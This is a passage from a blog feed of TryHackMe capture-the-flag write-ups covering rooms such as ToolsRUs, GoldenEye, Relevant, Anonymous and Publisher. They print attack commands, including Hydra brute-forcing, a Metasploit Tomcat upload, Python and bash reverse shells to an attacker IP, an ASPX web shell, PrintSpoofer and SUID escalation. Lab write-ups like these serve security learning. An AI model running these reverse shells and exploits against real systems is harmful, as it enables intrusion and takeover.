loads, revealing the flag in the document.\nflag{6255c55660e292cf0116c053c9937810}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nFeel free to drop a follow and connect with me on TryHackMe as well:\n\u0026lt;iframe src=”https://tryhackme.com/api/v2/badges/public-profile?userPublicId=3802254\" style=’border:none;’\u0026gt;\u0026lt;/iframe\u0026gt;\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"21 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/surfer-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SURFER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “OPERATION SLITHER” OPERATION SLITHER- TRY HACK ME- ROOMHello everyone! This is an easy rated room from the TryHackMe platform titled “OPERATION SLITHER”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nTo the game I used to play mid classes to kill timePhase 1: Social Media BreadcrumbingInitial Target IdentificationThe investigation begins with a single identifier: a username.\nI started by copying the initial username and performing an indexed search online.\nThe search results immediately pointed to an active profile on Threads (Answering Task 1).\nAnalyzing Threads for LeaksSocial media platforms are often the primary source of “OPSEC” (Operations Security) failures, especially in comment and reply sections where users may feel less scrutinized\nI scoured the target’s profile\nWithin a specific reply, I identified a suspicious character string.\nRecognizing the character set, I identified it as Base64.\nWe get the next flag:\nTHM{sl1th3ry_tw33tz_4nd_l34ky_r3pl13s!}During this analysis, I identified a secondary high-interest username involved in the conversation:\nmyst1cv1x3nPhase 2: Cross-Platform CorrelationPivoting to InstagramSearching for alternate media accounts for the new handle yielded no direct results.\nHowever, returning to the original Threads profile page revealed an Instagram link in the bio.\nThe Instagram profile contained 4 images and 1 video.\nUpon carefully reviewing the video content, I noticed a link to SoundCloud embedded in the description or visual frames.\nSoundCloud ForensicsWhile scrolling through the target’s SoundCloud profile, I located a hidden Base64 string:\nVEhNe3MwY20xbnRfMDBwczNjX2Yxbmczcl9tMXNjbDFja30=\nWe get the next flag:\nTHM{s0cm1nt_00ps3c_f1ng3r_m1scl1ck}Phase 3: Technical Repository AnalysisFinding the Third UserTo locate the third individual in this network.\nI moved from the content of the SoundCloud profile to the Following/Followers list.\nI identified a user with the handle\nsh4d0wF4NG.GitHub Repository InvestigationTracking this user required deeper digging into developer platforms.\nI performed a global search for the handle, which eventually led me to a GitHub profile.\nThe Path: https://github.com/sh4d0wF4NG?tab=repositories\n*Developers often accidentally leak credentials or sensitive configurations in their commit histories or public repositories.*\nCommit HistoryI focused on the repository titled “red team infra”\nI began checking the commits (the history of changes made to the code).\nI looked for keywords associated with the challenge tasks, specifically finding a commit related to “automation”.\nAfter scrolling through the changes in that specific commit, I found the final Base64 string:\nVEhNe3NoNHJwX2Y0bmd6X2wzNGszZF9ibDAwZHlfcHd9\nFinal flag:\nTHM{sh4rp_f4ngz_l34k3d_bl00dy_pw}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on Tryhackme:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"16 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/operation-slither-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"OPERATION SLITHER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “TOOLSRUS” TOOLSRUS- TRY HACK ME- ROOMHello everyone! This is an easy rated room from the TryHackMe platform titled “TOOLSRUS”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHope the resurrection actually happensPhase 1: Web Enumeration and Information GatheringInitial Landing PageThe investigation begins by visiting the victim’s IP address.\nThe page presents a “ToysRus” theme but contains a specific message:\nVisiting the victim IP, I see a page stating: Unfortunately, ToolsRUs is down for upgrades. Other parts of the website are still functional…\nI manually check robots.txt and the page source code, but neither reveals any immediate points of interest.\nDirectory Brute-Forcing with GobusterSince the main page is a dead end, I use the hint provided by the room to check for hidden subdirectories using a common wordlist.\nI execute a Gobuster scan:\ngobuster dir -u http://10.80.188.137 -w /usr/share/wordlists/dirb/common.txt -t 4The scan identifies several interesting paths:\n/guidelines, /protected, /server-status, and /index.html.Answering the first task, the directory that stands out is guidelines.\nLeaking the UsernameI navigate to the /guidelines directory to see what information it holds. This proves to be a critical pivot point as it contains a message intended for an employee.\nVisiting /guidelines, — I see the following message: { Hey bob, did you update that TomCat server? }\nThis answers the second task: the person’s name is bob.\nNavigating to the third task, I check the /protected directory.\nUpon visiting, the browser prompts for Basic Authentication.\nThis answers the third task: the directory is protected.\nPhase 2: Credential Cracking and Service DiscoveryBrute-Forcing with HydraNow that I have a valid username (bob) and a protected directory that requires a password.\nI use Hydra to perform a dictionary attack using the rockyou wordlist.\nI run the Hydra command:\nhydra -l bob -P /usr/share/wordlists/rockyou.txt.gz -f 10.80.188.137 http-get /protected -VHydra successfully finds the credentials: bob:bubbles.\nThis answers the fourth task: the password is bubbles.\nIdentifying the Secondary Web ServiceUpon entering the credentials to access the /protected page, I see a message stating that the service has been moved to a different port.\nI need to identify which port is hosting the actual Tomcat manager.\nPerforming a comprehensive Nmap scan to find all open ports and versions:\nnmap 10.80.188.137 -sV -sC -vThe scan reveals several open ports: 22 (SSH), 80 (HTTP), 1234, and 8009 (AJP).\nPort 1234 is identified as running Apache Tomcat. This answers the fifth task: the port is 1234.\nFingerprinting the Tomcat ServerI navigate to the service on the newly discovered port to confirm the version and administrative interface.\nVisiting http://10.80.188.137:1234/, the header confirms the version: Apache Tomcat/7.0.88. This answers the sixth task.\nI click on “Server Status” and provide the credentials I cracked earlier (bob:bubbles). This allows me to view the internal server status page.\nPhase 3: Vulnerability Assessment and Metasploit ExploitationVulnerability Scanning with NiktoFollowing the room’s hint, I use Nikto to scan the Tomcat manager directory.\nI run Nikto with the authenticated credentials:\nnikto -h http://10.80.188.137:1234/manager/html/ -id bob:bubblesIt finds 5 documents in the directory (answering the seventh task).\nIt identifies the Apache version on port 80 as Apache/2.4.18 (answering the eighth task).\nIt identifies the Apache-Coyote version on port 1234 as 1.1 (answering the ninth task).\nGaining a Root Shell via MetasploitSince I have administrative credentials for the Tomcat Manager, I can use Metasploit to upload a malicious file to gain Remote Code Execution (RCE).\nI launch Metasploit:\nmsfconsoleI search for the Tomcat upload module:\nsearch type:exploit name:tomcatI select the manager upload exploit:\nexploit/multi/http/tomcat_mgr_upload (Option 6).I configure the required parameters:\nset RHOSTS 10.80.188.137set RPORT 1234set HttpUsername bobset HttpPassword bubblesset LHOST \u0026lt;Your Machine IP\u0026gt;I execute the exploit:\nexploitThe exploit successfully uploads the payload and spawns a shell.\nI drop into a system shell \u0026amp; I check my current user :\nshellwhoamiThe command returns root. This answers the tenth task.\nFinal Flag RetrievalNow that I have full administrative control of the system, I navigate to the root directory to claim the final flag.\ncd /rootls -lacat flag.txtAnd we get the final flag:\nff1fc4a81affcc7688cf89ae7dc6e0e1CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on tryhackme: \u0026lt;iframe src=”https://tryhackme.com/api/v2/badges/public-profile?userPublicId=3802254\" style=’border:none;’\u0026gt;\u0026lt;/iframe\u0026gt;\nI also apologize for the delayed post, In one of my recent posts covering a hackthebox room, some one felt I was doing something illegal and ended reporting me to medium.\nLuckily medium support being real helpful helped sort out the issues and has given me a green light to resume posting walkthroughs.\nHopefully this doesn’t happen again and people, if there is a problem with my comments or any feedback, my comment section is always open.\nPlease do put comments or reach out to me and I’d love to hear feedback and work on things accordingly.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"10 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/toolsrus-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"TOOLSRUS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “GOLDEN EYE” GOLDEN EYE- TRY HACK ME- ROOMHello everyone! This is a medium rated room from the TryHackMe platform titled “GOLDEN EYE”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Initial Reconnaissance and Source Code AnalysisPort Scanning and Web DiscoveryWe begin by loading the victim webpage, which immediately redirects us to /sev-home/ for login.\nConcurrently, we initiate a thorough Nmap scan to identify all open services.\nLoading the victim webpage we see /sev-home/ to loginI start nmap scan on the side: nmap -sC -sV -p- 10.201.78.91 -T 5Port 25 (SMTP), 80 (HTTP), 55006, 55007 are openSource Code Analysis and First CredentialWe inspect the source code of the web page for hidden clues, which leads us to a JavaScript file containing encoded information.\nInspecting the source code I see terminal.jsChecking itboris may be the user and password is encodedAnother user is NatalyaWe extract and decode the highly obfuscated password hash:\nWe see the hash password: \u0026amp;#73;\u0026amp;#110;\u0026amp;#118;\u0026amp;#105;\u0026amp;#110;\u0026amp;#99;\u0026amp;#105;\u0026amp;#98;\u0026amp;#108;\u0026amp;#101;\u0026amp;#72;\u0026amp;#97;\u0026amp;#99;\u0026amp;#107;\u0026amp;#51;\u0026amp;#114;Using dcode cipher identifier I find out the hash is HTMLESCAPEDecoding it I get the password: InvincibleHack3rPhase 2: Exploiting POP3 and Credential CyclingInitial Web Login and POP3 DiscoveryUsing the first set of credentials, we gain access to the web portal and gather a critical clue about a non-default POP3 port.\nUsing the creds → boris:InvincibleHack3rI use it in login http://10.201.54.252/sev-home/We are in!Inspecting the page → we see authorised operators are: Natalya, BorisIn the text the it’s mentioned pop3 is in a non-default portWe attempt to connect to the identified non-default POP3 port (55007) but find the password is wrong, indicating the encoded password was outdated.\nNow trying to connect to pop3 server: nc 10.201.78.91 55007Using the creds but the password is wrongCracking Boris’s POP3 PasswordWe pivot to Hydra to brute-force the password for the user boris on the POP3 service.\nUsing hydra:\nhydra -l boris -P /usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64We get: secret1! as the passwordWe retry the connection, which is now successful, allowing us to read the mail.\nRetrying connection is successful\nnc 10.201.78.91 55007user borispass secret1!listWe see 3 mails\nretr 1retr 2retr 3Reading the 3 mails we find out about a new user named Xenia and how Natalya can break into our codesCracking Natalya’s POP3 PasswordWe immediately use Hydra to find the credentials for the next operator, Natalya.\nNow trying to enumerate and find Natalya’s creds:hydra -l Natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64We get the password as: birdLogging in as Natalya reveals crucial information about another user and two domain names.\nLet’s login using this now:\nnc 10.201.78.91 55007user Natalyapass birdlistretr 1retr 2Here we see another org user called Janus and Xenia being assigned to her and creds xenia:RCP90rulez!\nDomains revealed:\nsevernaya-station.com/gnocertdir and severnaya-station.com\nHostname Resolution SetupThe discovery of the new domain names necessitates updating our local hostname resolution.\nFor this we need to update it in our /etc/hostsUpdate the detailsPhase 3: Web Application Exploitation (Moodle)Gaining Access to the Moodle SiteWe access the web application at the specified directory using the new xenia credentials.\nNow accessing: http://severnaya-station.com/gnocertdir/ → we come to a landing pageI see the intro to golden eye post and click itit is asking for login → using xenia:RCP90rulez!poking around → Home / ▶ My profile / ▶ Messageswe see a new user: Dr.Dorak and he told his username is doakCracking Dr. Dorak’s CredentialsWe perform one final POP3 brute-force attack to find the password for the user doak.\ntrying to see if we can find his pass:hydra -l doak -P /usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64we get doak:goatLogging in as doak reveals yet another, final set of administrative credentials.\nnc 10.201.78.91 55007user doakpass goatlistretr 1Here we find another username and pass\ndr_doak:4England!Admin Access and Reverse Shell SetupUsing the new credentials, we log in as the administrator, find the plugin area, and configure it for remote code execution.\nusing this and logging in: http://severnaya-station.com/gnocertdir/ → {dr_doak:4England!}Home / ▶ My profile / ▶ My private files → s3cret.txt file is thereWe get clue about somethign juicy here: /dir007key/for-007.jpgWe visit the new path, where an image is visible, which we then inspect for steganography and metadata.\nVisiting it: http://severnaya-station.com/dir007key/for-007.jpg → we see an image under for JamesI immediately head for steganography, but no luckThen checking metadata by exiftool: exiftool for-007.jpgThen in image description I see: eFdpbnRlcjE5OTV4IQ==I know this is base 64 so decode itWe get: xWinter1995x!This final password gives us true administrative access. We log in and navigate to the plugin settings to set up a reverse shell.\nNow let’s use this and login as admin: http://severnaya-station.com/gnocertdir/ → admin:xWinter1995x!\nHome / ▶ Site administration / ▶ Search resultsWe note the path to aspell which indicates where the shell payload should be injected.\nThere is a search options and we see the path to aspellOpen a listener: nc -lvnp 3333And let’s use a payloadWe change the text editor plugin to PSpellShell and save the changes.\ngoing to: Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editorchange to PSpellShell → save changesWe inject the reverse shell payload into the aspell dump area.\nIn aspell dump the payload:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.2.13\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'To trigger the shell, we simply use the spell check function on a new post.\nnow we need to make a new post to trigger itHome / ▶ My profile / ▶ Blogs / ▶ Add a new entryjust click on ABC (spell check button) → and we catch shellPhase 4: Kernel Privilege EscalationIdentifying Vulnerable Kernel VersionWe retrieve the kernel version, which points to a known public exploit.\nGet kernel version: uname -a → 3.13.0-32-genericNow we go to the exploit.db link given and download the exploitCompiling and Executing the ExploitWe set up a Python server on our attacking machine, download the exploit to the victim’s /tmp directory, and confirm the compiler setting.\nNow this is the crucial part where I got stucknano 37292.c and scroll down completely and ensure it's cc and not gcc (if it's gcc it won't be able to create dynamic library)This is a critical stepSo if it’s gcc change it to cc → save itpython3 -m http.serverBack in the shell:\nBack to the shell tabcd /tmpwget http://10.9.2.13:8000/37292.ccat 37292.cConfirm if it has moved successfully and ensure it's cc once againFinally, we compile and run the exploit to achieve root access.\ncc 37292.c -o hack./hackcd /rootcat .flag.txt → 568628e0d993b1973adc718237da6e93568628e0d993b1973adc718237da6e93The challenge confirms the successful completion.\nThen going to webpage: http://severnaya-station.com/006-final/xvf7-flag/ → we see we have successfully come to the end of this challengeCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"25 January 2026","externalUrl":null,"permalink":"/writeups/tryhackme/golden-eye-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GOLDEN EYE- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “RELEVANT” RELEVANT- TRY HACK ME- ROOMHello everyone! This is a medium rated room from the TryHackMe platform titled “RELEVANT”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Enumeration and Credential DiscoveryNmap Scan and Service IdentificationWe begin by initiating a comprehensive Nmap scan to identify all open ports and services on the Windows target machine.\nStart with a nmap scan:\nnmap -sC -sV 10.201.15.149 -p- -T 5We see ports open: 80, 135, 139, 445, 3389, 49663, 49666, 49667\nThe open ports immediately highlight Windows communication protocols (135, 139, 445, 3389) and two potential web services (80 and 49663).\nAccessing the website on port 80 shows a default Windows layout, and checking port 49663 shows the same content.\nDiscovering Shared Files via SMBThe presence of ports 139 and 445 (SMB/NetBIOS) is a critical path for enumeration.\nWe check for anonymous or accessible shares using smbclient.\nSince I saw port 139/445 I check it:\nsmbclient -L 10.201.15.149And I see nt4wrksv-Disk\nWe connect to this share, which is found to contain a plaintext file. We download and analyze the file.\nsmbclient \\\\\\\\10.201.15.149\\\\nt4wrksvWe see: passwords.txt\nget passwords.txtexitNow we read the file\ncat passwords.txt:Qm9iIC0gIVBAJCRXMHJEITEyMw== \u0026amp; QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQkWe immediately recognize the base 64 encoding and decode the strings to retrieve two sets of credentials.\nBob — !P@$$W0rD!123Bill — Juw4nnaM4n420696969!$$$Phase 2: Initial Foothold via Web ShellPreparing the Reverse ShellThe SMB share is highly relevant as it appears to be tied to a web service.\nWe use directory scanning to confirm the path structure and prepare an ASPX reverse shell, as the environment is Windows (and therefore likely running IIS).\nNow this is possible by using .aspx files so we use a reverse shell for this\nPort 49663 is Windows RPC and often running IIS server\nSearching directories:\ndirsearch -u http://10.201.15.149:49663/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100We see nt4wrksv again\nWe download, modify, and upload a standard ASPX reverse shell from a github repository.\nSo now getting the revshell:\nwget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx\nChanging the ip \u0026amp; port\nNow let’s put that back in smb client:\nsmbclient \\\\\\\\10.201.15.149\\\\nt4wrksvput shell.aspxexitTriggering the Web Shell and Retrieving the User FlagWith the shell uploaded, we open a listener and trigger the file via the web path discovered.\nOpen listner:\nnc -lvnp 1234Initially it is:\nNow to trigger it on the web:\nhttp://10.201.82.143:49663/nt4wrksv/shell.aspxWe catch shell !!\nWe confirm our user and retrieve the first flag.\nwhoami -\u0026gt; dircd Users -\u0026gt; dircd Bob -\u0026gt; dircd Desktop -\u0026gt; dirtype user.txtTHM{fdk4ka34vk346ksxfr21tg789ktf45}Phase 3: Privilege Escalation to SYSTEMIdentifying the Impersonate PrivilegeFor privilege escalation, we check our current user’s security privileges, which reveals a highly exploitable capability.\nNow to escalate privilege\nwhoami /privWe see: SeImpersonatePrivilege → Impersonate a client after authentication → Enabled\nUsing PrintSpooferThe SeImpersonatePrivilege is vulnerable to exploits like PrintSpoofer.\nWe download the binary, upload it via the SMB share, and execute it on the target system.\nGoing up on the web and searching it:\nwget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exeBack in smb client let’s place it:\nput PrintSpoofer64.exeexitWe return to our shell, execute the binary, and confirm the highest level of privilege and back in shell:\ncd /cd inetpub -\u0026gt; cd wwwroot -\u0026gt; cd nt4wrksvdirWe see the .exe file sitting there and now let's execute itPrintSpoofer64.exe -i -c powershell.exewhoami\nThis Confirms we are nt authority/system\nFinally, we navigate to the Administrator’s desktop and retrieve the root flag.\ncd /cd Users -\u0026gt; cd Administrator -\u0026gt; cd Desktopdirtype root.txtTHM{1fk5kf469devly1gl320zafgl345pv}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 January 2026","externalUrl":null,"permalink":"/writeups/tryhackme/relevant-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"RELEVANT- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a Hard rated room from the TryHackMe platform titled “RETRO” RETRO- TRY HACK ME- ROOMHello everyone! This is a Hard rated room from the TryHackMe platform titled “RETRO”\nThis room is classified as HARD and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe Good ol’ Days :(Phase 1: Initial Enumeration and Web FootholdPort Scanning and Directory DiscoveryWe begin by visiting the main website, which presents a default Windows look\nI initiate a thorough Nmap scan to identify all open ports and services.\nnmap -sC -sV -Pn 10.201.11.171 -T 5Port 80 and 3389 are openThe open port 80 (HTTP) prompts directory enumeration to find hidden web resources.\nChecking for directories:\ngobuster dir -u http://10.201.11.171/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100We discover: /retro and /Retro\nGaining WordPress CredentialsVisiting the subdirectory I see a gamified page called retro fanatics\nScouring through the page I see login in the bottom and it’s a wordpress page login\nLooking through the posts the main user has the name of “Wade”\nInspecting through his posts I find a comment under ready player one\nI see the hint parzival\nUsing the discovered hint as a password, we successfully log into the WordPress site.\nUsing wade:parzival as creds I login to wordpressPhase 2: User Access and Privilege CheckRDP Login and User Flag RetrievalSince we saw port 3389 (RDP) was open, we attempt to use the newly\ndiscovered WordPress credentials for remote desktop access.\nxfreerdp3 /u:wade /p:parzival /v:10.201.11.171In the home screen we see user.txt\n3b99fbdc6d430bfb51c72c651a261927Once in the system as user wade, we check the current privilege level.\nGo to cmd → whoami → shows wade\nNow to escalate privileges\nwhoami /privWe see: SeChangeNotifyPrivilege → Bypass traverse checking → Enabled\nWe note the SeChangeNotifyPrivilege, which is sometimes involved in exploits.\nSearching it up on the web I see it’s a CVE\nFollowing these steps, we can easily guide you guys through the process\nhttps://www.youtube.com/watch?v=3BQKpPNlTSoPhase 3: Privilege Escalation to RootFinding the Hidden FileWe attempt a manual approach to check the Administrator directory, which fails, but leads us to a crucial file in the Recycle Bin.\nChecking file explorer I try getting into administrator but the password is incorrect\nI see recycle bin and see a file inside it: hhupd and restore it\nExploiting the ‘Save Page’ DialogWe run the restored executable, which immediately fails but gives us a path to exploit a Windows UI function.\nClicking on show more information → show information about publisher and we see a weblink → click on it but nothing loads\nSince there is no connection\nWe use the keyboard shortcut Ctrl + S in the non-loading browser window to download the page\nNow before clicking save type this manually:\nC:\\Windows\\System32\\*.*This will then show multiple options and scroll down\nFind CMD and right click on open on CMD\nwhoamicd Userscd Administratorcd Desktoptype root.txt.txt7958b569565d7bd88d10c6f22d1c4063CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nWrapping up 2025 with this final write-up — see you in 2026 with more!\nWishing you all a Merry Christmas and a Happy New Year.\n","date":"27 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/retro-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"RETRO- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “Anonymous ” ANONYMOUS- TRY HACK ME- ROOMHello everyone! This is a medium rated room from the TryHackMe platform titled “Anonymous ”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Initial Enumeration and FTP AccessNmap Scan and Service IdentificationWe begin by initiating an Nmap scan to identify open ports and services on the target machine.\nnmap -sC -sV 10.201.68.115 -T 5we see: 4 ports openp 21 has ftp running , p 22 has SSH runningp 139 and 445 is smbExploiting Anonymous FTP and File RetrievalWe first attempt to enumerate the SMB shares and discover an entry that suggests anonymous access.\nWe pivot to the FTP service, which commonly uses the same anonymous credentials.\nNext checking smbclient:\nsmbclient -L 10.201.103.96Using password anonymous we see : pics\nAccessing that through ftp: ftp 10.201.103.96\nUsing {anonymous:anonymous} as credentials\nls -alwe see scriptscd scriptsget clean.shget to_do.txtget removed_files.logexitPhase 2: Initial Foothold via File ManipulationReverse Shell Injection and ExecutionReading the retrieved files:\nIt reveals a plan for a shell based on modifying the clean.sh script, which is likely executed by the system via a scheduled job.\nWe need to place a reverse shell in clean.sh and execute it and then catch a shell\nWe inject our reverse shell payload into the clean.sh script, set up a listener, and upload the modified file back to the server.\nnano clean.shWe insert the payload:#!/bin/bashbash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;tryhackme-openvpn-ip\u0026gt;/4444 0\u0026gt;\u0026amp;1Open a listner in a new tab:\nnc -lvnp 4444Now to place it back so we login ftp again:\nftp 10.201.103.96cd scriptsput clean.shexitAnd we catch shell\nWe use the new shell to retrieve the user flag.\nls -lacat user.txt:90d6f992585815ff991e68748c414740Phase 3: Privilege Escalation via SUID BinaryDiscovering the SUID BinaryTo escalate privilege, we perform a search for binaries that have the SUID (Set User ID) bit set, allowing a non-root user to execute them with the permissions of the owner (root).\nNow escalating privilege\nWe check SUID binaries:\nfind / -user root -perm -u=s 2\u0026gt;/dev/nullWe see /usr/bin/env and this catches our attention\nRoot Shell ExecutionWe check GTFOBins for an exploit related to the /usr/bin/env binary and find a simple exploit that allows us to bypass shell restrictions and execute commands with root privileges.\nenv /bin/sh -pNow typing in this single line exploit we get root permissions\ncd /rootcat root.txt:4d930091c31a622a7ed10f27999af363CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anonymous-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ANONYMOUS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly somewhat forensic type room from the TryHackMe platform titled “PUBLISHER” PUBLISHER- TRY HACK ME- ROOMHello everyone! This is a beginner-friendly somewhat forensic type room from the TryHackMe platform titled “PUBLISHER”\nThis room is classified as easy and is a boot2root-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nMy thoughts always when reviewing my draft publicationsPhase 1: Initial Foothold via SPIP RCEEnumeration and Vulnerable Service IdentificationWe begin by visiting the main website, where the name of the underlying software is immediately visible, and concurrently run an Nmap scan.\nI go to website and see the community magzine webpage and the word spip catches my eyes\nI run nmap scan:\nnmap -sC -sV 10.201.49.35 -T 4I see port 22 and 80 open\nWe check for common web directories using Gobuster\ngobuster dir -u http://10.201.49.35/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100I see /spip and /images\nInspecting the /spip directory and using Wappalyzer confirms the exact software and version.\nSPIP v4.2.0Searching it up I see the RCE exploit in exploitdb\nRemote Code Execution (RCE) and SSH Key RetrievalWe use the identified exploit within Metasploit to gain a reverse shell and immediately look for a way to establish persistent access.\nmsfconsoleSearch spip and we see the last option which is RCE 2023use 12set RHOSTS \u0026lt;victim IP\u0026gt;set lhost \u0026lt;our ip\u0026gt;set TARGETURI /spiprunNow,\nshellFrom the shell, we navigate to the user’s home directory and retrieve their private SSH key.\ncd ../ → cd /home/thinkls -la → we see .sshcd .ssh → ls -lacat id_rsa → copy the contentIn a new terminal, we save the key and use it to log in as the user think via SSH.\nIn another terminal create a file:nano thinkshellpaste itssh -i thinkrsa think@10.201.49.35cat user.txtfa229046d44eda6a3598c73ad96f4ca5Phase 2: Local Enumeration and Writeable DirectoriesFinding a Writeable LocationWe attempt to run the Linpeas enumeration script but encounter permission errors, forcing us to find a temporary directory with write permissions.\nIn our host terminal:\ncd /usr/share/peass/linpeasthen,\npython -m http.serer 80Back at shell:\nwget http://10.9.2.204/linpeas.shBut this is denied\nNow this is because we don’t have permision to write and keep the file in these directories\nInstead, we search the filesystem for directories where the user think has write permissions.\nNow let’s find the directories with writeable permission: cd ../\nfind / -type d -user think -writable 2\u0026gt;/dev/nullAnd then we see: /run/user/1000\nRunning Linpeas and Identifying the Exploit PathWith a suitable location found, we download and execute the enumeration script.\ncd /run/user/1000wget http://10.9.2.204/linpeas.shchmod +x 